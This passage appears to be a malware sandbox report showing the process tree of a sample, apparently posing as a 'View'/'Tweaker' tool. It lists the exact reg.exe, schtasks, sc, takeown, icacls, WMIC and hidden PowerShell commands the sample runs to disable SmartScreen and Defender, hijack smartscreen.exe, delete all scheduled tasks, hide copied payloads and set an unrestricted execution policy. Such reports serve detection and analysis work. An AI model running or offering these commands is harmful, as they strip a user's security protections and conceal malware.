                                                                                                                                                                              C:\Windows\System32\reg.exe add "HKCU\Software\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t REG_DWORD /d "0" /f /reg:64
                                                                                                                                                                              8⤵
                                                                                                                                                                                PID:1704
                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                C:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d "0" /f
                                                                                                                                                                                8⤵
                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                PID:1944
                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\smartscreen.exe" /v "Debugger" /t REG_SZ /d "%windir%\System32\taskkill.exe" /f
                                                                                                                                                                                8⤵
                                                                                                                                                                                • Event Triggered Execution: Image File Execution Options Injection
                                                                                                                                                                                PID:1056
                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                C:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "6152" /f
                                                                                                                                                                                8⤵
                                                                                                                                                                                  PID:1872
                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                  C:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "1" /f
                                                                                                                                                                                  8⤵
                                                                                                                                                                                    PID:1380
                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                    C:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;" /f
                                                                                                                                                                                    8⤵
                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                    PID:1480
                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                    C:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "ModRiskFileTypes" /t REG_SZ /d ".bat;.exe;.reg;.vbs;.chm;.msi;.js;.cmd" /f
                                                                                                                                                                                    8⤵
                                                                                                                                                                                      PID:1808
                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                      C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t REG_SZ /d "Off" /f
                                                                                                                                                                                      8⤵
                                                                                                                                                                                        PID:1764
                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                        C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControlEnabled" /t REG_DWORD /d "0" /f
                                                                                                                                                                                        8⤵
                                                                                                                                                                                          PID:2972
                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                          C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControl" /t REG_DWORD /d "0" /f
                                                                                                                                                                                          8⤵
                                                                                                                                                                                            PID:1964
                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                            C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SmartScreen" /v "EnableSmartScreen" /t REG_DWORD /d "0" /f
                                                                                                                                                                                            8⤵
                                                                                                                                                                                              PID:2916
                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                              C:\Windows\System32\reg.exe add "HKCU\Software\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t REG_DWORD /d "0" /f
                                                                                                                                                                                              8⤵
                                                                                                                                                                                                PID:2844
                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                C:\Windows\System32\reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f /reg:64
                                                                                                                                                                                                8⤵
                                                                                                                                                                                                  PID:1696
                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                  C:\Windows\System32\reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                    PID:2932
                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                    C:\Windows\System32\reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                      PID:288
                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                      C:\Windows\System32\reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f /reg:64
                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                        PID:2936
                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                        C:\Windows\System32\reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                          PID:2296
                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                          C:\Windows\System32\reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f /reg:64
                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                            PID:1060
                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                            C:\Windows\System32\reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                            PID:1456
                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                            C:\Windows\System32\reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f /reg:64
                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                              PID:1996
                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                              C:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Control\CI\Policy" /v "VerifiedAndReputablePolicyState" /t REG_DWORD /d "0" /f /reg:64
                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                PID:1684
                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                C:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Control\CI\Policy" /v "VerifiedAndReputablePolicyState" /t REG_DWORD /d "0" /f
                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                  PID:844
                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                  C:\Windows\System32\schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                  PID:1140
                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                  C:\Windows\System32\schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                    PID:2980
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                    C:\Windows\System32\schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                      PID:2896
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                      C:\Windows\System32\schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                        PID:2580
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                        C:\Windows\System32\schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                          PID:2300
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                          C:\Windows\System32\sc.exe config webthreatdefsvc start= disabled
                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                                                                          PID:2828
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                          C:\Windows\System32\sc.exe config webthreatdefusersvc start= disabled
                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                                                                          PID:2920
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                                          C:\Windows\System32\takeown.exe /s KHBTHJFA /u Admin /f "C:\Windows\System32\smartscreen.exe"
                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                          • Possible privilege escalation attempt
                                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                          PID:2576
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                          C:\Windows\System32\icacls.exe "C:\Windows\System32\smartscreen.exe" /grant:r Admin:F
                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                          • Possible privilege escalation attempt
                                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                          PID:2216
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                          C:\Windows\System32\taskkill.exe /im smartscreen.exe /f
                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                          PID:2192
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                          C:\Windows\System32\attrib.exe -h -r -s "C:\Users\Admin\AppData\Local\Temp\*.*"
                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                          • Views/modifies file attributes
                                                                                                                                                                                                                          PID:676
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" echo F"
                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                          PID:2232
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                          xcopy /h /r /k /q /y "C:\Users\Admin\Desktop\View_nano.exe" "C:\Windows\note.exe"
                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                          • Enumerates system info in registry
                                                                                                                                                                                                                          PID:408
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" echo F"
                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                            PID:612
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                            xcopy /h /r /k /q /y "C:\Users\Admin\Desktop\View.exe" "C:\Windows\note.exe"
                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                            • Enumerates system info in registry
                                                                                                                                                                                                                            PID:1596
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" echo F"
                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                            PID:964
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                            xcopy /h /r /k /q /y "C:\Users\Admin\Desktop\View_nano.exe" "C:\Users\Public\shell.txt"
                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                            • Enumerates system info in registry
                                                                                                                                                                                                                            PID:628
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" echo F"
                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                              PID:1984
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                              xcopy /h /r /k /q /y "C:\Users\Admin\Desktop\View.exe" "C:\Users\Public\shell.txt"
                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                              • Enumerates system info in registry
                                                                                                                                                                                                                              PID:1104
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo F"
                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                PID:1020
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                xcopy /h /r /k /q /y "C:\Users\Public\Desktop\View_nano.exe" "C:\Windows\note.exe"
                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                • Enumerates system info in registry
                                                                                                                                                                                                                                PID:880
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /S /D /c" echo F"
                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                  PID:1288
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  xcopy /h /r /k /q /y "C:\Users\Public\Desktop\View.exe" "C:\Windows\note.exe"
                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                  • Enumerates system info in registry
                                                                                                                                                                                                                                  PID:1440
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" echo F"
                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                    PID:896
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                    xcopy /h /r /k /q /y "C:\Users\Public\Desktop\View_nano.exe" "C:\Users\Public\shell.txt"
                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                    • Enumerates system info in registry
                                                                                                                                                                                                                                    PID:2244
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" echo F"
                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                    PID:1524
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                    xcopy /h /r /k /q /y "C:\Users\Public\Desktop\View.exe" "C:\Users\Public\shell.txt"
                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                    • Enumerates system info in registry
                                                                                                                                                                                                                                    PID:1648
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" echo F"
                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                      PID:3052
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                      xcopy /h /r /k /q /y "C:\ProgramData\View_nano.exe" "C:\Windows\note.exe"
                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                                                                                                      PID:3056
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo F"
                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                        PID:2320
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                        xcopy /h /r /k /q /y "C:\ProgramData\View.exe" "C:\Windows\note.exe"
                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                        • Enumerates system info in registry
                                                                                                                                                                                                                                        PID:820
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" echo F"
                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                          PID:1528
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                          xcopy /h /r /k /q /y "C:\ProgramData\View_nano.exe" "C:\Users\Public\shell.txt"
                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                          • Enumerates system info in registry
                                                                                                                                                                                                                                          PID:3064
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" echo F"
                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                            PID:556
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                            xcopy /h /r /k /q /y "C:\ProgramData\View.exe" "C:\Users\Public\shell.txt"
                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                            • Enumerates system info in registry
                                                                                                                                                                                                                                            PID:792
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                            C:\Windows\System32\attrib.exe -h -r -s "C:\ProgramData\*.*"
                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                            • Views/modifies file attributes
                                                                                                                                                                                                                                            PID:1992
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                            C:\Windows\System32\attrib.exe +h +r +s "C:\ProgramData\1_ADMIN_OK.ini"
                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                            • Views/modifies file attributes
                                                                                                                                                                                                                                            PID:1536
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                            C:\Windows\System32\attrib.exe +h +r +s "C:\ProgramData\1_ADMIN_ERRO.ini"
                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                            • Views/modifies file attributes
                                                                                                                                                                                                                                            PID:968
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                            C:\Windows\System32\attrib.exe -h -r -s "C:\ProgramData\*.*"
                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                            • Views/modifies file attributes
                                                                                                                                                                                                                                            PID:592
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                            C:\Windows\System32\attrib.exe -h -r -s "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\*.*"
                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                            • Drops desktop.ini file(s)
                                                                                                                                                                                                                                            • Views/modifies file attributes
                                                                                                                                                                                                                                            PID:2460
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                            C:\Windows\System32\attrib.exe -h -r -s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.*"
                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                            • Drops startup file
                                                                                                                                                                                                                                            • Views/modifies file attributes
                                                                                                                                                                                                                                            PID:2116
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                            C:\Windows\System32\attrib.exe -h -r -s "C:\Users\Admin\AppData\Local\Temp\Tweaker\*.*"
                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                            • Views/modifies file attributes
                                                                                                                                                                                                                                            PID:2568
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                            C:\Windows\System32\attrib.exe -h -r -s "C:\Windows\SysWOW64\en\*.*"
                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                                                                            • Views/modifies file attributes
                                                                                                                                                                                                                                            PID:2364
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                            C:\Windows\System32\attrib.exe -h -r -s "C:\Users\Public\*.*"
                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                            • Drops desktop.ini file(s)
                                                                                                                                                                                                                                            • Views/modifies file attributes
                                                                                                                                                                                                                                            PID:704
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                            C:\Windows\System32\attrib.exe +h +r +s "C:\Users\Admin\AppData\Local\Temp\Tweaker\*.lst"
                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                            • Views/modifies file attributes
                                                                                                                                                                                                                                            PID:1640
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                            C:\Windows\System32\attrib.exe +h +r +s "C:\Windows\SysWOW64\en\*.lst"
                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                            • Views/modifies file attributes
                                                                                                                                                                                                                                            PID:1932
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                            C:\Windows\System32\attrib.exe -h -r -s "C:\Windows\L2cache"
                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                                                            • Views/modifies file attributes
                                                                                                                                                                                                                                            PID:2080
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                            C:\Windows\System32\reg.exe delete "HKCU\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /va /f
                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                            PID:888
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                            C:\Windows\System32\reg.exe delete "HKCU\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /va /f /reg:64
                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                            PID:1040
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                            C:\Windows\System32\wbem\WMIC.exe process where "name like '%Systemfont.exe%'" Call Terminate
                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                            • Kills process with WMI
                                                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                            PID:2152
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                            C:\Windows\System32\wbem\WMIC.exe process where "name like '%palemoon.exe%'" Call Terminate
                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                            • Kills process with WMI
                                                                                                                                                                                                                                            PID:1900
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                            C:\Windows\System32\wbem\WMIC.exe process where "name like '%screen.exe%'" Call Terminate
                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                            • Kills process with WMI
                                                                                                                                                                                                                                            PID:3036
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                            C:\Windows\System32\wbem\WMIC.exe process where "name like '%choice.exe%'" Call Terminate
                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                            • Kills process with WMI
                                                                                                                                                                                                                                            PID:2336
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                            C:\Windows\System32\wbem\WMIC.exe process where "name like '%fontdrvhots.exe%'" Call Terminate
                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                            • Kills process with WMI
                                                                                                                                                                                                                                            PID:2352
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                            C:\Windows\System32\wbem\WMIC.exe process where "name like '%tv_x86.exe%'" Call Terminate
                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                            • Kills process with WMI
                                                                                                                                                                                                                                            PID:1588
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                            C:\Windows\System32\attrib.exe -h -r -s "C:\Users\Admin\AppData\Local\Temp\Tweaker\*.lst"
                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                            • Views/modifies file attributes
                                                                                                                                                                                                                                            PID:2676
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                            C:\Windows\System32\attrib.exe -h -r -s "C:\Windows\SysWOW64\en\*.lst"
                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                            • Views/modifies file attributes
                                                                                                                                                                                                                                            PID:2272
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                            C:\Windows\System32\wbem\WMIC.exe service where "name like 'Intel(R) Utiliti'" call stopservice
                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                              PID:2456
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                              C:\Windows\System32\wbem\WMIC.exe Service Where "name like 'Intel(R) Utiliti'" Call Delete
                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                PID:2852
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                C:\Windows\System32\netsh.exe stop "Intel(R) Utiliti"
                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                PID:980
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                C:\Windows\System32\SC.exe DELETE "Intel(R) Utiliti"
                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                • Launches sc.exe
                                                                                                                                                                                                                                                PID:2744
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                C:\Windows\System32\schtasks.exe /Delete /TN * /F
                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                  PID:2836
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                  C:\Windows\System32\wbem\WMIC.exe process where "name like '%IntelSvc.exe%'" Call Terminate
                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                  • Kills process with WMI
                                                                                                                                                                                                                                                  PID:2904
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                  C:\Windows\System32\wbem\WMIC.exe process where "name like '%fontdrvhots.exe%'" Call Terminate
                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                  • Kills process with WMI
                                                                                                                                                                                                                                                  PID:2908
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                  C:\Windows\System32\wbem\WMIC.exe process where "name like '%tv_x86.exe%'" Call Terminate
                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                  • Kills process with WMI
                                                                                                                                                                                                                                                  PID:2476
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                  C:\Windows\System32\attrib.exe +h +r +s "C:\Users\Public\shell.txt"
                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                  • Views/modifies file attributes
                                                                                                                                                                                                                                                  PID:2848
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                  C:\Windows\System32\attrib.exe -h -r -s "C:\Users\Public\shell.txt"
                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                  • Views/modifies file attributes
                                                                                                                                                                                                                                                  PID:2616
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -Command "Start-Process C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -ArgumentList 'Set-ExecutionPolicy Unrestricted' -Verb RunAs -windowstyle hidden"
                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                  PID:2652
